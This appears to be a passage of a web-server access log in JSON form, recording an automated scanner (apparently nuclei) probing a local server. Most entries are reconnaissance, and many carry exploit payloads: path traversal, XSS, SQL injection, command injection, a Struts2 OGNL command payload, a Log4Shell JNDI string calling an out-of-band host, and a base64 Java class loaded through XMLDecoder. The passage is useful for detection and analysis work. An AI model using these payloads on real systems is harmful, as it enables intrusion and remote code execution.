"request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fck/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logs/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.075","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Gruntfile.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.075","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /PRTG/index.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.072","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.084","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?url=..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.062","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"UPusername=%22%3E%3Cscript%3Ejavascript%3Aalert%28document.cookie%29%3C%2Fscript%3E&UPpassword=%22%3E%3Cscript%3Ejavascript%3Aalert%28document.cookie%29%3C%2Fscript%3E","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /MUP/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.072","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"127.0.0.1/MUP", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%E3%80%B1example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.102","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/manifest.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.067","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellcheckder.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.080","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET .//WEB-INF/weblogic.xml HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"-", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logs/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /graph_realtime.php?action=init HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.065","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Gruntfile.coffee HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET .//WEB-INF/web.xml HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"-", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.dbeaver/credentials-config.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%E3%80%B5example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ueditor/php/getRemoteImage.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /magmi/web/ajax_gettime.php?prefix=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"{\x22query\x22:\x22query {\x5Cn nuclei1:__typename \x5Cn nuclei2:__typename \x5Cn nuclei3:__typename \x5Cn nuclei4:__typename \x5Cn nuclei5:__typename \x5Cn nuclei6:__typename \x5Cn }\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /kustomization.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%E3%82%9Dexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+98989*443131,1--+&site=admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-app.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20nuclei.txt%60 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /+CSCOE+/session_password.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /websso/SAML2/SSO/vsphere.local?SAMLRequest= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"${jndi:${lower:d}n${lower:s}://${env:hostName}.ca28bc0smpvbbtig07h07n7w6i147axfn.oast.pro}"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.069","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%E3%83%BCexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"29KBxXFfVfTXsWYtcDMArYgXiNi.tld","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.064","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5(8888)),1) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nuclei.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"xxxxorg.slf4j.ext.EventData<java><void class=\x22sun.misc.BASE64Decoder\x22><void method=\x22decodeBuffer\x22 id=\x22byte_arr\x22><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7</string></void></void><void class=\x22org.mozilla.classfile.DefiningClassLoader\x22><void method=\x22defineClass\x22><string>ResultBaseExec</string><object idref=\x22byte_arr\x22></object><void method=\x22newInstance\x22><void method=\x22do_exec\x22 id=\x22result\x22><string>echo${IFS}COP-9272-9102-EVC|rev</string></void></void></void></void><void 